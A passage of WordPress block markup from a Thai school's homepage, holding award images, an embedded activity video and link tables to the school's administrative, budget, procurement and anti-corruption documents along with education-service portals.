/wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=sharing\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" 